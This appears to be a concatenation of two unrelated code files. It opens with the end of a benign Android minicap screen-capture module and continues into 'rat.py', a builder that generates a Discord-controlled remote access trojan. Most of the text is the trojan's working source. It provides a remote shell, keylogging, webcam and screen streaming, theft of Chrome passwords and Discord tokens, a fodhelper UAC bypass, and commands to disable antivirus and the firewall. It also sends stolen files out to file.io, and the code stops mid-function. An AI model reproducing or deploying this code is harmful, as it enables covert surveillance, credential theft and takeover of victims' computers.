minicap_bin = "minicap-nopie"
minicap_bin_path = os.path.join(local_minicap_path, 'libs', abi, minicap_bin)
device.push_file(local_file=minicap_bin_path, remote_dir=self.remote_minicap_path)
minicap_so_path = os.path.join(local_minicap_path, 'jni', 'libs', f'android-{sdk}', abi, 'minicap.so')
device.push_file(local_file=minicap_so_path, remote_dir=self.remote_minicap_path)
self.logger.debug("minicap installed.")
def tear_down(self):
try:
delete_minicap_cmd = "adb -s %s shell rm -r %s" % (self.device.serial, self.remote_minicap_path)
p = subprocess.Popen(delete_minicap_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception:
pass
def connect(self):
device = self.device
display = device.get_display_info(refresh=True)
if 'width' not in display or 'height' not in display or 'orientation' not in display:
self.logger.warning("Cannot get the size of current device.")
return
w = display['width']
h = display['height']
if w > h:
temp = w
w = h
h = temp
o = display['orientation'] * 90
self.width = w
self.height = h
self.orientation = o
size_opt = "%dx%d@%dx%d/%d" % (w, h, w, h, o)
grant_minicap_perm_cmd = "adb -s %s shell chmod -R a+x %s" % \
(device.serial, self.remote_minicap_path)
start_minicap_cmd = "adb -s %s shell LD_LIBRARY_PATH=%s %s/minicap -P %s" % \
(device.serial, self.remote_minicap_path, self.remote_minicap_path, size_opt)
self.logger.debug("starting minicap: " + start_minicap_cmd)
p = subprocess.Popen(grant_minicap_perm_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
self.minicap_process = subprocess.Popen(start_minicap_cmd.split(),
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Wait 2 seconds for starting minicap
time.sleep(2)
self.logger.debug("minicap started.")
try:
# forward host port to remote port
forward_cmd = "adb -s %s forward tcp:%d %s" % (device.serial, self.port, MINICAP_REMOTE_ADDR)
subprocess.check_call(forward_cmd.split())
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
import threading
listen_thread = threading.Thread(target=self.listen_messages)
listen_thread.start()
except socket.error as e:
self.connected = False
self.logger.warning(e)
raise MinicapException()
def listen_messages(self):
self.logger.debug("start listening minicap images ...")
CHUNK_SIZE = 4096
readBannerBytes = 0
bannerLength = 2
readFrameBytes = 0
frameBodyLength = 0
frameBody = bytearray()
banner = {
"version": 0,
"length": 0,
"pid": 0,
"realWidth": 0,
"realHeight": 0,
"virtualWidth": 0,
"virtualHeight": 0,
"orientation": 0,
"quirks": 0,
}
self.connected = True
while self.connected:
chunk = bytearray(self.sock.recv(CHUNK_SIZE))
if not chunk:
continue
chunk_len = len(chunk)
cursor = 0
while cursor < chunk_len and self.connected:
if readBannerBytes < bannerLength:
if readBannerBytes == 0:
banner['version'] = chunk[cursor]
elif readBannerBytes == 1:
banner['length'] = bannerLength = chunk[cursor]
elif 2 <= readBannerBytes <= 5:
banner['pid'] += (chunk[cursor] << ((readBannerBytes - 2) * 8))
elif 6 <= readBannerBytes <= 9:
banner['realWidth'] += (chunk[cursor] << ((readBannerBytes - 6) * 8))
elif 10 <= readBannerBytes <= 13:
banner['realHeight'] += (chunk[cursor] << ((readBannerBytes - 10) * 8))
elif 14 <= readBannerBytes <= 17:
banner['virtualWidth'] += (chunk[cursor] << ((readBannerBytes - 14) * 8))
elif 18 <= readBannerBytes <= 21:
banner['virtualHeight'] += (chunk[cursor] << ((readBannerBytes - 18) * 8))
elif readBannerBytes == 22:
banner['orientation'] += chunk[cursor] * 90
elif readBannerBytes == 23:
banner['quirks'] = chunk[cursor]
cursor += 1
readBannerBytes += 1
if readBannerBytes == bannerLength:
self.banner = banner
self.logger.debug("minicap initialized: %s" % banner)
elif readFrameBytes < 4:
frameBodyLength += (chunk[cursor] << (readFrameBytes * 8))
cursor += 1
readFrameBytes += 1
else:
if chunk_len - cursor >= frameBodyLength:
frameBody += chunk[cursor: cursor + frameBodyLength]
self.handle_image(frameBody)
cursor += frameBodyLength
frameBodyLength = readFrameBytes = 0
frameBody = bytearray()
else:
frameBody += chunk[cursor:]
frameBodyLength -= chunk_len - cursor
readFrameBytes += chunk_len - cursor
cursor = chunk_len
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def handle_image(self, frameBody):
# Sanity check for JPG header, only here for debugging purposes.
if frameBody[0] != 0xFF or frameBody[1] != 0xD8:
self.logger.warning("Frame body does not start with JPG header")
self.last_screen = frameBody
self.last_screen_time = datetime.now()
self.last_views = None
self.logger.debug("Received an image at %s" % self.last_screen_time)
self.check_rotation()
def check_rotation(self):
current_time = datetime.now()
if (current_time - self.last_rotation_check_time).total_seconds() < ROTATION_CHECK_INTERVAL_S:
return
display = self.device.get_display_info(refresh=True)
if 'orientation' in display:
cur_orientation = display['orientation'] * 90
if cur_orientation != self.orientation:
self.device.handle_rotation()
self.last_rotation_check_time = current_time
def check_connectivity(self):
"""
check if droidbot app is connected
:return: True for connected
"""
if not self.connected:
return False
if self.last_screen_time is None:
return False
return True
def disconnect(self):
"""
disconnect telnet
"""
self.connected = False
if self.sock is not None:
try:
self.sock.close()
except Exception as e:
print(e)
if self.minicap_process is not None:
try:
self.minicap_process.terminate()
except Exception as e:
print(e)
try:
forward_remove_cmd = "adb -s %s forward --remove tcp:%d" % (self.device.serial, self.port)
p = subprocess.Popen(forward_remove_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception as e:
print(e)
def get_views(self):
"""
get UI views using cv module
opencv-python need to be installed for this function
:return: a list of views
"""
if not self.last_screen:
self.logger.warning("last_screen is None")
return None
if self.last_views:
return self.last_views
from . import cv
img = cv.load_image_from_buf(self.last_screen)
view_bounds = cv.find_views(img)
root_view = {
"class": "CVViewRoot",
"bounds": [[0, 0], [self.width, self.height]],
"enabled": True,
"temp_id": 0
}
views = [root_view]
temp_id = 1
for x,y,w,h in view_bounds:
view = {
"class": "CVView",
"bounds": [[x,y], [x+w, y+h]],
"enabled": True,
"temp_id": temp_id,
"signature": cv.calculate_dhash(img[y:y+h, x:x+w]),
"parent": 0,
"children": []
}
views.append(view)
temp_id += 1
root_view["children"] = list(range(1, temp_id))
self.last_views = views
return views
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
minicap = Minicap()
try:
minicap.set_up()
minicap.connect()
except:
minicap.disconnect()
minicap.tear_down()
minicap.device.disconnect()
|
rat.py
|
from colorama import Fore
import time, sys, os, ctypes, shutil
def discordrat():
def spinner():
l = ['|', '/', '-', '\\']
for i in l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Creating File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
print('\n')
for i in l+l+l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Writing File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
os.system('cls')
discordrattitle()
print(f"""{y}[{w}+{y}]{w} Enter the name you want to give to the final file: """)
global filename
fileName = str(input(f"""{y}[{b}#{y}]{w} File name: """))
print(f"""\n\n{y}[{w}+{y}]{w} Enter the token of the bot you will use to execute the RAT commands: """)
global tokenbot
tokenbot = str(input(f"""{y}[{b}#{y}]{w} Bot token: """))
print('\n')
spinner()
try:
with open(f"temp/{fileName}.py", "w") as file:
file.write("""import winreg, ctypes, asyncio, discord, sys, os, ssl, random, threading, time, cv2, subprocess, discord
helpmenu = """+'"""'+"""
Availaible commands are :
--> !message = Show a message box displaying your text / Syntax = "!message example"
--> !shell = Execute a shell command /Syntax = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get chrome browser history
--> !download = Download a file from infected computer
--> !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
--> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !startkeylogger = Starts a keylogger
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume to max
--> !volumezero = Put volume at 0
--> !idletime = Get the idle time of user's on target computer
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
--> !uacbypass = attempt to bypass uac to gain admin by using fod helper
--> !passwords = grab all chrome passwords
--> !streamwebcam = streams webcam by sending multiple pictures
--> !stopwebcam = stop webcam stream
--> !getdiscordinfo = get discord token,email,phone number,etc
--> !streamscreen = stream screen by sending multiple pictures
--> !stopscreen = stop screen stream
--> !shutdown = shutdown computer
--> !restart = restart computer
--> !logoff = log off current user
--> !bluescreen = BlueScreen PC
--> !displaydir = display all items in current dir
--> !currentdir = display the current dir
--> !dateandtime = display system date and time
--> !prockill = kill a process by name / syntax = "!kill process.exe"
--> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
--> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
--> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
--> !disableantivirus = permanently disable windows defender(requires admin)
--> !disablefirewall = disable windows firewall (requires admin)
--> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
--> !selfdestruct = delete all traces that this program was on the target PC
--> !windowspass = attempt to phish password by poping up a password dialog
--> !displayoff = turn off the monitor(Admin rights are required)
--> !displayon = turn on the monitors(Admin rights are required)
--> !hide = hide the file by changing the attribute to hidden
--> !unhide = unhide the file the removing the attribute to make it unhidden
--> !ejectcd = eject the cd drive on computer
--> !retractcd = retract the cd drive on the computer
--> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
--> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
--> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
--> !distaskmgr = disable task manager(Admin rights are required)
--> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
--> !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
--> !startup = add file to startup(when computer go on this file starts)(Admin rights are required)
"""+'"""'+"""
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
from discord.ext import commands
from ctypes import *
from discord import utils
token = '~~TOKENHERE~~'
global appdata
appdata = os.getenv('APPDATA')
client = discord.Client()
bot = commands.Bot(command_prefix='!')
ssl._create_default_https_context = ssl._create_unverified_context
async def activity(client):
import time
import win32gui
while True:
global stop_threads
if stop_threads:
break
current_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
window_displayer = discord.Game(f"Visiting: {current_window}")
await client.change_presence(status=discord.Status.online, activity=window_displayer)
time.sleep(1)
def between_callback(client):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(activity(client))
loop.close()
@client.event
async def on_ready():
import platform
import re
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
flag = data['country_code']
ip = data['IPv4']
import os
total = []
global number
number = 0
global channel_name
channel_name = None
for x in client.get_all_channels():
total.append(x.name)
for y in range(len(total)):
if "session" in total[y]:
import re
result = [e for e in re.split("[^0-9]", total[y]) if e != '']
biggest = max(map(int, result))
number = biggest + 1
else:
pass
if number == 0:
channel_name = "session-1"
newchannel = await client.guilds[0].create_text_channel(channel_name)
else:
channel_name = f"session-{number}"
newchannel = await client.guilds[0].create_text_channel(channel_name)
channel_ = discord.utils.get(client.get_all_channels(), name=channel_name)
channel = client.get_channel(channel_.id)
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
value1 = f"@here :white_check_mark: New session opened {channel_name} | {platform.system()} {platform.release()} | :flag_{flag.lower()}: | User : {os.getlogin()}"
if is_admin == True:
await channel.send(f'{value1} | admin!')
elif is_admin == False:
await channel.send(value1)
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
def volumeup():
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
if volume.GetMute() == 1:
volume.SetMute(0, None)
volume.SetMasterVolumeLevel(volume.GetVolumeRange()[1], None)
def volumedown():
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
volume.SetMasterVolumeLevel(volume.GetVolumeRange()[0], None)
def critproc():
import ctypes
ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0
def uncritproc():
import ctypes
ctypes.windll.ntdll.RtlSetProcessIsCritical(0, 0, 0) == 0
@client.event
async def on_message(message):
if message.channel.name != channel_name:
pass
else:
total = []
for x in client.get_all_channels():
total.append(x.name)
if message.content.startswith("!kill"):
try:
if message.content[6:] == "all":
for y in range(len(total)):
if "session" in total[y]:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=total[y])
await channel_to_delete.delete()
else:
pass
else:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=message.content[6:])
await channel_to_delete.delete()
await message.channel.send(f"[*] {message.content[6:]} killed.")
except:
await message.channel.send(f"[!] {message.content[6:]} is invalid,please enter a valid session name")
if message.content == "!dumpkeylogger":
import os
temp = os.getenv("TEMP")
file_keys = temp + r"\key_log.txt"
file = discord.File(file_keys, filename="key_log.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.popen(f"del {file_keys}")
if message.content == "!exit":
import sys
uncritproc()
sys.exit()
if message.content == "!windowstart":
import threading
global stop_threads
stop_threads = False
global _thread
_thread = threading.Thread(target=between_callback, args=(client,))
_thread.start()
await message.channel.send("[*] Window logging for this session started")
if message.content == "!windowstop":
stop_threads = True
await message.channel.send("[*] Window logging for this session stopped")
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
if message.content == "!screenshot":
import os
from mss import mss
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(path)
if message.content == "!volumemax":
volumeup()
await message.channel.send("[*] Volume put to 100%")
if message.content == "!volumezero":
volumedown()
await message.channel.send("[*] Volume put to 0%")
if message.content == "!webcampic":
import os
import time
import cv2
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
#time.sleep(0.1)
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
del(camera)
file = discord.File(temp + r"\\temp.png", filename="temp.png")
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!message"):
import ctypes
import time
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
def mess():
ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box
import threading
messa = threading.Thread(target=mess)
messa._running = True
messa.daemon = True
messa.start()
import win32con
import win32gui
def get_all_hwnd(hwnd,mouse):
def winEnumHandler(hwnd, ctx):
if win32gui.GetWindowText(hwnd) == "Error":
win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
return None
else:
pass
if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):
win32gui.EnumWindows(winEnumHandler,None)
win32gui.EnumWindows(get_all_hwnd, 0)
if message.content.startswith("!wallpaper"):
import ctypes
import os
path = os.path.join(os.getenv('TEMP') + r"\\temp.jpg")
await message.attachments[0].save(path)
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0)
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!upload"):
await message.attachments[0].save(message.content[8:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!shell"):
global status
import time
status = None
import subprocess
import os
instruction = message.content[7:]
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
dele = "del" + temp + r"\output.txt"
os.popen(dele)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
status = None
if message.content.startswith("!download"):
import subprocess
import os
filename=message.content[10:]
check2 = os.stat(filename).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
response = requests.post('https://file.io/', files={"file": open(filename, "rb")}).json()["link"]
await message.channel.send("download link: " + response)
await message.channel.send("[*] Command successfuly executed")
else:
file = discord.File(message.content[10:], filename=message.content[10:])
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!cd"):
import os
os.chdir(message.content[4:])
await message.channel.send("[*] Command successfuly executed")
if message.content == "!help":
import os
temp = (os.getenv('TEMP'))
f5 = open(temp + r"\helpmenu.txt", 'a')
f5.write(str(helpmenu))
f5.close()
temp = (os.getenv('TEMP'))
file = discord.File(temp + r"\helpmenu.txt", filename="helpmenu.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\helpmenu.txt /f")
if message.content.startswith("!write"):
import pyautogui
if message.content[7:] == "enter":
pyautogui.press("enter")
else:
pyautogui.typewrite(message.content[7:])
if message.content == "!clipboard":
import ctypes
import os
CF_TEXT = 1
kernel32 = ctypes.windll.kernel32
kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
kernel32.GlobalLock.restype = ctypes.c_void_p
kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
user32 = ctypes.windll.user32
user32.GetClipboardData.restype = ctypes.c_void_p
user32.OpenClipboard(0)
if user32.IsClipboardFormatAvailable(CF_TEXT):
data = user32.GetClipboardData(CF_TEXT)
data_locked = kernel32.GlobalLock(data)
text = ctypes.c_char_p(data_locked)
value = text.value
kernel32.GlobalUnlock(data_locked)
body = value.decode()
user32.CloseClipboard()
await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + str(body))
if message.content == "!sysinfo":
import platform
jak = str(platform.uname())
intro = jak[12:]
from requests import get
ip = get('https://api.ipify.org').text
pp = "IP Address = " + ip
await message.channel.send("[*] Command successfuly executed : " + intro + pp)
if message.content == "!geolocate":
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}"
await message.channel.send("[*] Command successfuly executed : " + link)
if message.content == "!admincheck":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
await message.channel.send("[*] Congrats you're admin")
elif is_admin == False:
await message.channel.send("[!] Sorry, you're not admin")
if message.content == "!uacbypass":
import winreg
import ctypes
import sys
import os
import time
import inspect
def isAdmin():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
if isAdmin():
await message.channel.send("Your already admin!")
else:
await message.channel.send("attempting to get admin!")
if message.content == "!uacbypass":
uncritproc()
test_str = sys.argv[0]
current_dir = inspect.getframeinfo(inspect.currentframe()).filename
cmd2 = current_dir
create_reg_path = \""" powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force \"""
os.system(create_reg_path)
create_trigger_reg_key = \""" powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force \"""
os.system(create_trigger_reg_key)
create_payload_reg_key = \"""powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python \""" + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\\'"' + \""" -Force\"""
os.system(create_payload_reg_key)
class disable_fsr():
disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self.disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self.revert(self.old_value)
with disable_fsr():
os.system("fodhelper.exe")
time.sleep(2)
remove_reg = \""" powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force \"""
os.system(remove_reg)
if message.content == "!startkeylogger":
import base64
import os
from pynput.keyboard import Key, Listener
import logging
temp = os.getenv("TEMP")
log_dir = temp
logging.basicConfig(filename=(log_dir + r"\key_log.txt"),
level=logging.DEBUG, format='%%(asctime)s: %%(message)s')
def keylog():
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
import threading
global test
test = threading.Thread(target=keylog)
test._running = True
test.daemon = True
test.start()
await message.channel.send("[*] Keylogger successfuly started")
if message.content == "!stopkeylogger":
import os
test._running = False
await message.channel.send("[*] Keylogger successfuly stopped")
if message.content == "!idletime":
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
import threading
global idle1
idle1 = threading.Thread(target=get_idle_duration)
idle1._running = True
idle1.daemon = True
idle1.start()
duration = get_idle_duration()
await message.channel.send('User idle for %%.2f seconds.' % duration)
import time
time.sleep(1)
if message.content.startswith("!voice"):
volumeup()
import win32com.client as wincl
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak(message.content[7:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!blockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(True)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content.startswith("!unblockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!streamwebcam" :
await message.channel.send("[*] Command successfuly executed")
import os
import time
import cv2
import threading
import sys
import pathlib
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
running = message.content
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
delelelee = "del " + file + r" /f"
os.system(delelelee)
os.system(r"RMDIR %temp%\hobo /s /q")
while True:
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
boom = discord.File(temp + r"\\temp.png", filename="temp.png")
kool = await message.channel.send(file=boom)
temp = (os.getenv('TEMP'))
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
del camera
break
else:
continue
if message.content == "!stopwebcam":
import os
os.system(r"mkdir %temp%\hobo")
os.system(r"echo hello>%temp%\hobo\hello.txt")
os.system(r"del %temp\\temp.png /F")
if message.content == "!getdiscordinfo":
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\\\Discord",
"Discord Canary": ROAMING + "\\\\discordcanary",
"Discord PTB": ROAMING + "\\\\discordptb",
"Google Chrome": LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera": ROAMING + "\\\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex": LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = f\"""
Email: {email}
Phone: {phone}
Nitro: {nitro}
Billing Info: {billing}
value: IP: {ip}
Username: {pc_username}
PC Name: {pc_name}
Token Location: {platform}
Token : {token}
username: {username} ({user_id})
\"""
return str(embed)
try:
embed = main()
await message.channel.send("[*] Command successfuly executed\\n"+str(embed))
except Exception as e:
pass
if message.content == "!streamscreen" :
await message.channel.send("[*] Command successfuly executed")
import os
from mss import mss
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
os.system(r"del %temp%\hobos\hellos.txt /f")
os.system(r"RMDIR %temp%\hobos /s /q")
else:
pass
while True:
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send(file=file)
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
break
else:
continue
if message.content == "!stopscreen":
import os
os.system(r"mkdir %temp%\hobos")
os.system(r"echo hello>%temp%\hobos\hellos.txt")
os.system(r"del %temp%\monitor.png /F")
if message.content == "!shutdown":
import os
uncritproc()
os.system("shutdown /p")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!restart":
import os
uncritproc()
os.system("shutdown /r /t 00")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!logoff":
import os
uncritproc()
os.system("shutdown /l /f")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!bluescreen":
import ctypes
import ctypes.wintypes
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
